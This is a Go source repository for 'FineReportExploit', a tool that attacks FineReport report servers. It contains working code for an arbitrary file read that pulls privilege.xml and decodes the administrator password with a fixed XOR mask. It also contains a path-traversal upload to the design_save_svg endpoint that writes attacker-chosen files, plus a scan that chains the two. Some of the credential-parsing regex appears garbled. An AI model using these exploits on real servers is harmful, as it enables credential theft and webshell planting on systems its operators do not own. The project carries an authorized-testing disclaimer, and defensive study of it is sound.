├── .DS_Store
├── .gitattributes
├── CNVD201804757
├── CNVD201804757.go
├── DecPass.go
└── GetUserAndPass.go
├── LICENSE
├── README.md
├── V9Getshell
└── V9Getshell.go
├── VulScan
└── VulScan.go
├── cmd
├── CNVD201804757.go
├── V9Getshell.go
├── VulScan.go
└── root.go
├── go.mod
├── go.sum
├── main.go
└── utils
├── FixUrl.go
├── GetMd5.go
├── PostData.go
└── UrlGet.go
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Drac0nids/FineReportExploit/7ab34683dad353c3e3bc39f8c9910e6ffd5752de/.DS_Store
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/CNVD201804757/CNVD201804757.go:
--------------------------------------------------------------------------------
1 | package CNVD201804757
2 |
3 | import (
4 | "FineReportExploit/utils"
5 | "fmt"
6 | "io/ioutil"
7 | "net/http"
8 | "strings"
9 | )
10 |
// CNVD201804757 probes url for the file read this tool labels CNVD201804757.
// It asks ReportServer for privilege.xml, first at the root path and then
// under /WebReport, and stops at the first hit. Read prints the result of a
// hit; this function prints only the "not vulnerable" banner when both miss.
//
// Detection: both probes are GET requests whose query string carries
// op=chart, cmd=get_geo_json and resourcepath=privilege.xml, so they show up
// verbatim in web access logs.
func CNVD201804757(url string) {
	base := utils.FixUrl(url)
	candidates := []string{
		"/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml",
		"/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml",
	}
	for _, path := range candidates {
		// The second path is requested only when the first one misses.
		if Read(base, path) {
			return
		}
	}
	fmt.Println("====================")
	fmt.Println("不存在漏洞:CNVD201804757")
	fmt.Println("====================")
}
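// Read requests url+dir and reports whether the response body contains
// "rootManagerName", the marker this tool uses to recognise privilege.xml.
// On a hit it prints the account name and the decoded password returned by
// GetUserAndPass, so the program output must be handled as sensitive data.
//
// A failed request or an unreadable body is printed and reported as false.
func Read(url string, dir string) bool {
	resp, err := http.Get(url + dir)
	if err != nil {
		// resp is nil on error. A bare recover() outside a deferred call is a
		// no-op, so the old code went on to dereference the nil response.
		fmt.Println(err)
		return false
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err)
		return false
	}

	bodyStr := string(body)
	if !strings.Contains(bodyStr, "rootManagerName") {
		return false
	}

	fmt.Println("====================")
	fmt.Println("存在漏洞:CNVD201804757")
	fmt.Println("读取密码文件privilege.xml成功")
	user, pass := GetUserAndPass(bodyStr)
	fmt.Println("用户名:" + user)
	fmt.Println("密码:" + pass)
	fmt.Println("====================")
	return true
}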
52 |
--------------------------------------------------------------------------------
/CNVD201804757/DecPass.go:
--------------------------------------------------------------------------------
1 | package CNVD201804757
2 |
3 | import (
4 | "strconv"
5 | )
6 |
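// DecPass decodes an obfuscated password string. The first three characters
// are dropped; the rest is read as groups of four hexadecimal digits, and each
// group is XORed with a repeating eight-value mask to give one character.
// Trailing characters that do not fill a group are ignored, and input shorter
// than the three-character prefix yields "".
//
// The mask is a constant in this code, so the stored value is an encoding
// rather than encryption: whoever can read the stored string can recover the
// password. A password exposed this way has to be rotated, not just re-saved.
func DecPass(pass string) string {
	mask := [...]int{19, 78, 10, 15, 100, 213, 43, 23}
	const (
		prefixLen = 3
		groupLen  = 4
	)

	// Guard the slice below; shorter input used to panic.
	if len(pass) < prefixLen {
		return ""
	}
	pass = pass[prefixLen:]

	groups := len(pass) / groupLen
	out := make([]rune, 0, groups)
	for i := 0; i < groups; i++ {
		// The parse error is deliberately dropped: a group that is not valid
		// hex yields 0, which keeps the output aligned with the input groups
		// exactly as before.
		c, _ := strconv.ParseInt(pass[i*groupLen:(i+1)*groupLen], 16, 32)
		// Convert through rune; string(int) is rejected by go vet.
		out = append(out, rune(int(c)^mask[i%len(mask)]))
	}
	return string(out)
}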
19 |
--------------------------------------------------------------------------------
/CNVD201804757/GetUserAndPass.go:
--------------------------------------------------------------------------------
1 | package CNVD201804757
2 |
3 | import (
4 | "regexp"
5 | "strings"
6 | )
7 |
// GetUserAndPass takes the first match of expr1 and of expr2 in data, removes
// "\n" and "\r" from each, and returns the first as the user name and the
// second, passed through DecPass, as the password.
//
// NOTE(review): as listed, both patterns are a line break followed by `\S+`,
// and six of the Replace calls have an empty old and new string, which leaves
// the value unchanged. The gutter also skips lines 18 and 27. This looks like
// markup lost when the listing was rendered — confirm against the repository
// before relying on this text.
func GetUserAndPass(data string) (string, string) {
	expr1 := `
\S+`
	expr2 := `
\S+`
	// The Compile error is discarded; a nil *Regexp would panic in FindString.
	regexp1, _ := regexp.Compile(expr1)
	User := regexp1.FindString(data)
	User = strings.Replace(User, "", "", -1)
	User = strings.Replace(User, "", "", -1)
	User = strings.Replace(User, "", "", -1)
	User = strings.Replace(User, "\n", "", -1)
	User = strings.Replace(User, "\r", "", -1)

	regexp2, _ := regexp.Compile(expr2)
	Pass := regexp2.FindString(data)
	Pass = strings.Replace(Pass, "", "", -1)
	Pass = strings.Replace(Pass, "", "", -1)
	Pass = strings.Replace(Pass, "", "", -1)
	Pass = strings.Replace(Pass, "\n", "", -1)
	Pass = strings.Replace(Pass, "\r", "", -1)

	// The matched value is stored obfuscated; DecPass reverses it.
	Pass = DecPass(Pass)
	return User, Pass

}
35 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 |
2 | Apache License
3 | Version 2.0, January 2004
4 | http://www.apache.org/licenses/
5 |
6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
7 |
8 | 1. Definitions.
9 |
10 | "License" shall mean the terms and conditions for use, reproduction,
11 | and distribution as defined by Sections 1 through 9 of this document.
12 |
13 | "Licensor" shall mean the copyright owner or entity authorized by
14 | the copyright owner that is granting the License.
15 |
16 | "Legal Entity" shall mean the union of the acting entity and all
17 | other entities that control, are controlled by, or are under common
18 | control with that entity. For the purposes of this definition,
19 | "control" means (i) the power, direct or indirect, to cause the
20 | direction or management of such entity, whether by contract or
21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
22 | outstanding shares, or (iii) beneficial ownership of such entity.
23 |
24 | "You" (or "Your") shall mean an individual or Legal Entity
25 | exercising permissions granted by this License.
26 |
27 | "Source" form shall mean the preferred form for making modifications,
28 | including but not limited to software source code, documentation
29 | source, and configuration files.
30 |
31 | "Object" form shall mean any form resulting from mechanical
32 | transformation or translation of a Source form, including but
33 | not limited to compiled object code, generated documentation,
34 | and conversions to other media types.
35 |
36 | "Work" shall mean the work of authorship, whether in Source or
37 | Object form, made available under the License, as indicated by a
38 | copyright notice that is included in or attached to the work
39 | (an example is provided in the Appendix below).
40 |
41 | "Derivative Works" shall mean any work, whether in Source or Object
42 | form, that is based on (or derived from) the Work and for which the
43 | editorial revisions, annotations, elaborations, or other modifications
44 | represent, as a whole, an original work of authorship. For the purposes
45 | of this License, Derivative Works shall not include works that remain
46 | separable from, or merely link (or bind by name) to the interfaces of,
47 | the Work and Derivative Works thereof.
48 |
49 | "Contribution" shall mean any work of authorship, including
50 | the original version of the Work and any modifications or additions
51 | to that Work or Derivative Works thereof, that is intentionally
52 | submitted to Licensor for inclusion in the Work by the copyright owner
53 | or by an individual or Legal Entity authorized to submit on behalf of
54 | the copyright owner. For the purposes of this definition, "submitted"
55 | means any form of electronic, verbal, or written communication sent
56 | to the Licensor or its representatives, including but not limited to
57 | communication on electronic mailing lists, source code control systems,
58 | and issue tracking systems that are managed by, or on behalf of, the
59 | Licensor for the purpose of discussing and improving the Work, but
60 | excluding communication that is conspicuously marked or otherwise
61 | designated in writing by the copyright owner as "Not a Contribution."
62 |
63 | "Contributor" shall mean Licensor and any individual or Legal Entity
64 | on behalf of whom a Contribution has been received by Licensor and
65 | subsequently incorporated within the Work.
66 |
67 | 2. Grant of Copyright License. Subject to the terms and conditions of
68 | this License, each Contributor hereby grants to You a perpetual,
69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
70 | copyright license to reproduce, prepare Derivative Works of,
71 | publicly display, publicly perform, sublicense, and distribute the
72 | Work and such Derivative Works in Source or Object form.
73 |
74 | 3. Grant of Patent License. Subject to the terms and conditions of
75 | this License, each Contributor hereby grants to You a perpetual,
76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
77 | (except as stated in this section) patent license to make, have made,
78 | use, offer to sell, sell, import, and otherwise transfer the Work,
79 | where such license applies only to those patent claims licensable
80 | by such Contributor that are necessarily infringed by their
81 | Contribution(s) alone or by combination of their Contribution(s)
82 | with the Work to which such Contribution(s) was submitted. If You
83 | institute patent litigation against any entity (including a
84 | cross-claim or counterclaim in a lawsuit) alleging that the Work
85 | or a Contribution incorporated within the Work constitutes direct
86 | or contributory patent infringement, then any patent licenses
87 | granted to You under this License for that Work shall terminate
88 | as of the date such litigation is filed.
89 |
90 | 4. Redistribution. You may reproduce and distribute copies of the
91 | Work or Derivative Works thereof in any medium, with or without
92 | modifications, and in Source or Object form, provided that You
93 | meet the following conditions:
94 |
95 | (a) You must give any other recipients of the Work or
96 | Derivative Works a copy of this License; and
97 |
98 | (b) You must cause any modified files to carry prominent notices
99 | stating that You changed the files; and
100 |
101 | (c) You must retain, in the Source form of any Derivative Works
102 | that You distribute, all copyright, patent, trademark, and
103 | attribution notices from the Source form of the Work,
104 | excluding those notices that do not pertain to any part of
105 | the Derivative Works; and
106 |
107 | (d) If the Work includes a "NOTICE" text file as part of its
108 | distribution, then any Derivative Works that You distribute must
109 | include a readable copy of the attribution notices contained
110 | within such NOTICE file, excluding those notices that do not
111 | pertain to any part of the Derivative Works, in at least one
112 | of the following places: within a NOTICE text file distributed
113 | as part of the Derivative Works; within the Source form or
114 | documentation, if provided along with the Derivative Works; or,
115 | within a display generated by the Derivative Works, if and
116 | wherever such third-party notices normally appear. The contents
117 | of the NOTICE file are for informational purposes only and
118 | do not modify the License. You may add Your own attribution
119 | notices within Derivative Works that You distribute, alongside
120 | or as an addendum to the NOTICE text from the Work, provided
121 | that such additional attribution notices cannot be construed
122 | as modifying the License.
123 |
124 | You may add Your own copyright statement to Your modifications and
125 | may provide additional or different license terms and conditions
126 | for use, reproduction, or distribution of Your modifications, or
127 | for any such Derivative Works as a whole, provided Your use,
128 | reproduction, and distribution of the Work otherwise complies with
129 | the conditions stated in this License.
130 |
131 | 5. Submission of Contributions. Unless You explicitly state otherwise,
132 | any Contribution intentionally submitted for inclusion in the Work
133 | by You to the Licensor shall be under the terms and conditions of
134 | this License, without any additional terms or conditions.
135 | Notwithstanding the above, nothing herein shall supersede or modify
136 | the terms of any separate license agreement you may have executed
137 | with Licensor regarding such Contributions.
138 |
139 | 6. Trademarks. This License does not grant permission to use the trade
140 | names, trademarks, service marks, or product names of the Licensor,
141 | except as required for reasonable and customary use in describing the
142 | origin of the Work and reproducing the content of the NOTICE file.
143 |
144 | 7. Disclaimer of Warranty. Unless required by applicable law or
145 | agreed to in writing, Licensor provides the Work (and each
146 | Contributor provides its Contributions) on an "AS IS" BASIS,
147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
148 | implied, including, without limitation, any warranties or conditions
149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
150 | PARTICULAR PURPOSE. You are solely responsible for determining the
151 | appropriateness of using or redistributing the Work and assume any
152 | risks associated with Your exercise of permissions under this License.
153 |
154 | 8. Limitation of Liability. In no event and under no legal theory,
155 | whether in tort (including negligence), contract, or otherwise,
156 | unless required by applicable law (such as deliberate and grossly
157 | negligent acts) or agreed to in writing, shall any Contributor be
158 | liable to You for damages, including any direct, indirect, special,
159 | incidental, or consequential damages of any character arising as a
160 | result of this License or out of the use or inability to use the
161 | Work (including but not limited to damages for loss of goodwill,
162 | work stoppage, computer failure or malfunction, or any and all
163 | other commercial damages or losses), even if such Contributor
164 | has been advised of the possibility of such damages.
165 |
166 | 9. Accepting Warranty or Additional Liability. While redistributing
167 | the Work or Derivative Works thereof, You may choose to offer,
168 | and charge a fee for, acceptance of support, warranty, indemnity,
169 | or other liability obligations and/or rights consistent with this
170 | License. However, in accepting such obligations, You may act only
171 | on Your own behalf and on Your sole responsibility, not on behalf
172 | of any other Contributor, and only if You agree to indemnify,
173 | defend, and hold each Contributor harmless for any liability
174 | incurred by, or claims asserted against, such Contributor by reason
175 | of your accepting any such warranty or additional liability.
176 |
177 | END OF TERMS AND CONDITIONS
178 |
179 | APPENDIX: How to apply the Apache License to your work.
180 |
181 | To apply the Apache License to your work, attach the following
182 | boilerplate notice, with the fields enclosed by brackets "[]"
183 | replaced with your own identifying information. (Don't include
184 | the brackets!) The text should be enclosed in the appropriate
185 | comment syntax for the file format. We also recommend that a
186 | file or class name and description of purpose be included on the
187 | same "printed page" as the copyright notice for easier
188 | identification within third-party archives.
189 |
190 | Copyright [yyyy] [name of copyright owner]
191 |
192 | Licensed under the Apache License, Version 2.0 (the "License");
193 | you may not use this file except in compliance with the License.
194 | You may obtain a copy of the License at
195 |
196 | http://www.apache.org/licenses/LICENSE-2.0
197 |
198 | Unless required by applicable law or agreed to in writing, software
199 | distributed under the License is distributed on an "AS IS" BASIS,
200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
201 | See the License for the specific language governing permissions and
202 | limitations under the License.
203 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # FineReportExploit
2 | 基于go语言的帆软报表漏洞检测工具
3 |
4 |
5 | ### 编译
6 | ```
7 | go build -o FineReportExploit main.go
8 | ```
9 | ### 漏洞扫描
10 | ```
11 | ./FineReportExploit VulScan -u http://xxx.xxx.xxx.xxx
12 | ```
13 | ### 漏洞利用
14 | #### V9Getshell
15 | 帆软V9 文件上传漏洞
16 | ```
17 | ./FineReportExploit V9Getshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端文件名
18 | ```
19 | #### CNVD201804757
20 | 帆软V8任意文件读取漏洞
21 | ```
22 | ./FineReportExploit CNVD201804757 -u http://xxx.xxx.xxx.xxx
23 | ```
24 | 如果存在漏洞,那么读取privilege.xml,返回管理员用户名和解密后的密码
25 |
26 | ## 免责声明
27 | 本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
28 | 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。
29 |
--------------------------------------------------------------------------------
/V9Getshell/V9Getshell.go:
--------------------------------------------------------------------------------
1 | package V9Getshell
2 |
3 | import (
4 | "FineReportExploit/utils"
5 | "io/ioutil"
6 | "os"
7 | "strings"
8 | )
9 |
// V9Getshell reads the local file named by file and POSTs its contents,
// wrapped in a JSON object, to the design_save_svg command of ReportServer on
// url. The filePath query value starts in chartmapsvg and climbs three levels
// with "../" before naming .svg/<name>.
//
// Detection: the request is a POST whose query string carries op=svginit,
// cmd=design_save_svg and a filePath containing "../"; all three appear
// verbatim in web access logs.
//
// NOTE(review): the ReadAll error is never checked, and the value returned by
// utils.PostData is used without a nil check.
func V9Getshell(url string, file string, name string) {
	url = utils.FixUrl(url)
	//url = url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../update.jsp"
	url = url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../.svg/" + name
	fil, err := os.Open(file)
	if err != nil {
		panic(err)
	}
	defer fil.Close()
	content, err := ioutil.ReadAll(fil)
	s := string(content)
	s2 := strings.Replace(s, `"`, `\"`, -1)

	// The request body is assembled by string concatenation, not a JSON encoder.
	str1 := "{\"__CONTENT__\":\""
	str2 := "\",\"__CHARSET__\":\"UTF-8\"}"
	post_body := str1 + s2 + str2

	header := make(map[string]string)
	header["Content-Type"] = "application/json"
	resp := utils.PostData(url, post_body, header)
	// The response is closed without being read, so the server's answer is
	// never inspected here.
	resp.Body.Close()
}
32 |
--------------------------------------------------------------------------------
/VulScan/VulScan.go:
--------------------------------------------------------------------------------
1 | package VulScan
2 |
3 | import (
4 | "FineReportExploit/CNVD201804757"
5 | "FineReportExploit/V9Getshell"
6 | "FineReportExploit/utils"
7 | "fmt"
8 | "io/ioutil"
9 | "os"
10 | "time"
11 | )
12 |
// VulScan runs both checks of this tool against url and prints a banner for
// each result.
//
// The first check is active, not passive: it writes a marker file named
// <md5>.txt in the working directory, uploads it with V9Getshell.V9Getshell,
// waits five seconds, and compares the body fetched from
// /WebReport/.svg/<md5>.txt with the marker. The second check calls
// CNVD201804757.CNVD201804757.
//
// NOTE(review): os.Remove deletes only the local copy. Nothing here removes
// the uploaded marker from the server, so a positive result leaves a file on
// the target that has to be cleaned up afterwards (and that a defender can
// search for under the .svg directory).
func VulScan(url string) {
	url = utils.FixUrl(url)

	//V9Getshell
	// Despite its name this holds time.Now().String(), used only as input to
	// the MD5 call that produces the marker.
	timeUnixNano := time.Now().String()
	md5str := utils.GetMd5(string(timeUnixNano))
	err := ioutil.WriteFile(md5str+".txt", []byte(md5str), 0644)
	if err != nil {
		panic(err)
	}
	name := md5str + ".txt"
	V9Getshell.V9Getshell(url, name, name)
	// The error from Remove is ignored.
	os.Remove(name)

	time.Sleep(5 * time.Second)
	body_str := utils.UrlGet(url + "/WebReport/.svg/" + name)
	if body_str == md5str {
		fmt.Println("====================")
		fmt.Println("存在漏洞:V9Getshell")
		fmt.Println("写入文件成功:" + url + "/WebReport/.svg/" + name)
		fmt.Println("====================")
	} else {
		fmt.Println("====================")
		fmt.Println("不存在漏洞:V9Getshell")
		fmt.Println("====================")
	}

	//CNVD201804757
	CNVD201804757.CNVD201804757(url)

}
44 |
--------------------------------------------------------------------------------
/cmd/CNVD201804757.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "FineReportExploit/CNVD201804757"
20 | "github.com/spf13/cobra"
21 | )
22 |
// CNVD201804757Cmd is the "CNVD201804757" subcommand. Its Run handler passes
// the package-level Target, bound to -u/--url in init, to
// CNVD201804757.CNVD201804757.
//
// NOTE(review): Long is still the cobra generator placeholder and tells the
// operator nothing about what the command requests from the target.
var CNVD201804757Cmd = &cobra.Command{
	Use: "CNVD201804757",
	Short: "帆软报表 v8.0 任意文件读取漏洞",
	Long: `A longer description that spans multiple lines and likely contains examples
and usage of using your command. For example:

Cobra is a CLI library for Go that empowers applications.
This application is a tool to generate the needed files
to quickly create a Cobra application.`,
	Run: func(cmd *cobra.Command, args []string) {
		CNVD201804757.CNVD201804757(Target)
	},
}
37 |
// init attaches the CNVD201804757 subcommand to rootCmd and binds its
// -u/--url flag to the shared Target variable.
func init() {
	rootCmd.AddCommand(CNVD201804757Cmd)

	flags := CNVD201804757Cmd.PersistentFlags()
	flags.StringVarP(&Target, "url", "u", "", "存在漏洞的url")
}
53 |
--------------------------------------------------------------------------------
/cmd/V9Getshell.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "FineReportExploit/V9Getshell"
20 | "github.com/spf13/cobra"
21 | )
22 |
// File is the local path given with -f/--file.
var File string

// Target is the base URL given with -u/--url. The CNVD201804757 and VulScan
// commands bind their own -u flag to this same variable.
var Target string

// ServerFileName is the name given with -n/--name (default "test.txt").
var ServerFileName string

// V9GetshellCmd is the "V9Getshell" subcommand. Its Run handler passes Target,
// File and ServerFileName to V9Getshell.V9Getshell.
//
// NOTE(review): Long is still the cobra generator placeholder.
var V9GetshellCmd = &cobra.Command{
	Use: "V9Getshell",
	Short: "帆软报表V9,任意文件覆盖漏洞",
	Long: `A longer description that spans multiple lines and likely contains examples
and usage of using your command. For example:

Cobra is a CLI library for Go that empowers applications.
This application is a tool to generate the needed files
to quickly create a Cobra application.`,
	Run: func(cmd *cobra.Command, args []string) {
		// All three values come from the flags registered in init; no address
		// is hard-coded here.
		V9Getshell.V9Getshell(Target, File, ServerFileName)
	},
}
42 |
// init attaches the V9Getshell subcommand to rootCmd and binds its three
// flags: -f/--file, -u/--url and -n/--name (default "test.txt").
func init() {
	rootCmd.AddCommand(V9GetshellCmd)

	flags := V9GetshellCmd.PersistentFlags()
	flags.StringVarP(&File, "file", "f", "", "待上传的文件")
	flags.StringVarP(&Target, "url", "u", "", "存在漏洞的url")
	flags.StringVarP(&ServerFileName, "name", "n", "test.txt", "服务端生成的文件名称")
}
60 |
--------------------------------------------------------------------------------
/cmd/VulScan.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "FineReportExploit/VulScan"
20 | "github.com/spf13/cobra"
21 | )
22 |
// VulScanCmd is the "VulScan" subcommand. Its Run handler passes the
// package-level Target, bound to -u/--url in init, to VulScan.VulScan.
//
// NOTE(review): Short and Long are still the cobra generator placeholders, so
// the help output does not tell the operator that the scan uploads a marker
// file to the target.
var VulScanCmd = &cobra.Command{
	Use: "VulScan",
	Short: "A brief description of your command",
	Long: `A longer description that spans multiple lines and likely contains examples
and usage of using your command. For example:

Cobra is a CLI library for Go that empowers applications.
This application is a tool to generate the needed files
to quickly create a Cobra application.`,
	Run: func(cmd *cobra.Command, args []string) {
		VulScan.VulScan(Target)
	},
}
37 |
// init attaches the VulScan subcommand to rootCmd and binds its -u/--url flag
// to the shared Target variable.
func init() {
	rootCmd.AddCommand(VulScanCmd)

	flags := VulScanCmd.PersistentFlags()
	flags.StringVarP(&Target, "url", "u", "", "存在漏洞的url")
}
52 |
--------------------------------------------------------------------------------
/cmd/root.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "github.com/spf13/cobra"
20 | )
21 |
// cfgFile receives the value of the --config flag registered in init.
// NOTE(review): no code in the listed files reads it — confirm whether it is
// used.
var cfgFile string

// rootCmd represents the base command when called without any subcommands.
// It has no Run handler, so it only carries the help text and the subcommands
// added by the other init functions in this package.
//
// NOTE(review): Short is still the cobra generator placeholder.
var rootCmd = &cobra.Command{
	Use: "FineReportExploit",
	Short: "A brief description of your application",
	Long: `作者:Drac0nids
一款基于Go语言开发的帆软报表漏洞利用工具
声明:仅供安全人员进行有授权的验证,勿用于非法测试,由于使用工具带来的不良后果与本人无关。`,
	// Uncomment the following line if your bare application
	// has an action associated with it:
	// Run: func(cmd *cobra.Command, args []string) { },
}
35 |
// Execute runs the root command and hands any error it returns to
// cobra.CheckErr. main.main calls it once.
func Execute() {
	err := rootCmd.Execute()
	cobra.CheckErr(err)
}
41 |
// init registers the root command's flags: the persistent --config flag,
// stored in cfgFile, and the local -t/--toggle flag left over from the cobra
// template.
func init() {
	persistent := rootCmd.PersistentFlags()
	persistent.StringVar(&cfgFile, "config", "", "config file (default is $HOME/.FineReportExploit.yaml)")

	local := rootCmd.Flags()
	local.BoolP("toggle", "t", false, "Help message for toggle")
}
54 |
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module FineReportExploit
2 |
3 | go 1.18
4 |
5 | require (
6 | github.com/inconshreveable/mousetrap v1.0.0 // indirect
7 | github.com/spf13/cobra v1.5.0 // indirect
8 | github.com/spf13/pflag v1.0.5 // indirect
9 | )
10 |
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o=
2 | github.com/inconshreveable/mousetrap v1.0.0 h1:Z8tu5sraLXCXIcARxBp/8cbvlwVa7Z1NHg9XEKhtSvM=
3 | github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8=
4 | github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
5 | github.com/spf13/cobra v1.5.0 h1:X+jTBEBqF0bHN+9cSMgmfuvv2VHJ9ezmFNf9Y/XstYU=
6 | github.com/spf13/cobra v1.5.0/go.mod h1:dWXEIy2H428czQCjInthrTRUg7yKbok+2Qi/yBIJoUM=
7 | github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
8 | github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
9 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
10 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
11 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package main
17 |
18 | import "FineReportExploit/cmd"
19 |
// main hands control to the cobra command tree defined in package cmd.
func main() {
	cmd.Execute()
}
23 |
--------------------------------------------------------------------------------
/utils/FixUrl.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
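// FixUrl returns target without a single trailing "/", so that callers can
// append a path that begins with "/". An empty string is returned unchanged;
// indexing it used to panic.
func FixUrl(target string) string {
	if n := len(target); n > 0 && target[n-1] == '/' {
		return target[:n-1]
	}
	return target
}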
10 |
--------------------------------------------------------------------------------
/utils/GetMd5.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "crypto/md5"
5 | "fmt"
6 | )
7 |
// GetMd5 returns the MD5 digest of a as 32 lowercase hexadecimal characters.
// MD5 is not collision resistant, so the result is suitable as an identifier
// only, never as an integrity or authentication value.
func GetMd5(a string) string {
	digest := md5.Sum([]byte(a))
	return fmt.Sprintf("%x", digest)
}
13 |
--------------------------------------------------------------------------------
/utils/PostData.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "bytes"
5 | "fmt"
6 | "io"
7 | "io/ioutil"
8 | "net/http"
9 | "time"
10 | )
11 |
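// PrintLnResp prints the body of resp to standard output. A nil response or a
// nil body prints nothing, and a read error is printed in place of the body.
// The body is not closed here; that stays with the caller.
func PrintLnResp(resp *http.Response) {
	if resp == nil || resp.Body == nil {
		return
	}
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println(string(body))
}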
16 |
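// PostData sends data as the body of a POST request to url, with a 10 second
// client timeout, and returns the response.
//
// Each entry of header is applied with Header.Set, which adds the header or
// replaces an existing value. header may be nil.
//
// The result is nil when the request cannot be built or sent; the error is
// printed. Callers must check for nil before touching resp.Body and must close
// the body of a non-nil response.
func PostData(url string, data string, header map[string]string) *http.Response {
	req, err := http.NewRequest("POST", url, bytes.NewBufferString(data))
	if err != nil {
		// A bare recover() outside a deferred call is a no-op, so the old code
		// fell through with a nil request and panicked.
		fmt.Println(err)
		return nil
	}
	req.Close = true

	// Ranging over a nil map is a no-op, so no nil check is needed.
	for k, v := range header {
		req.Header.Set(k, v)
	}

	client := http.Client{Timeout: 10 * time.Second}
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return nil
	}
	return resp
}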
42 |
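// PostData2 sends the contents of data as the body of a POST request to url,
// with a 10 second client timeout, and returns the response. It differs from
// PostData only in taking the body as an io.Reader.
//
// Each entry of header is applied with Header.Set, which adds the header or
// replaces an existing value. header may be nil.
//
// The result is nil when the request cannot be built or sent; the error is
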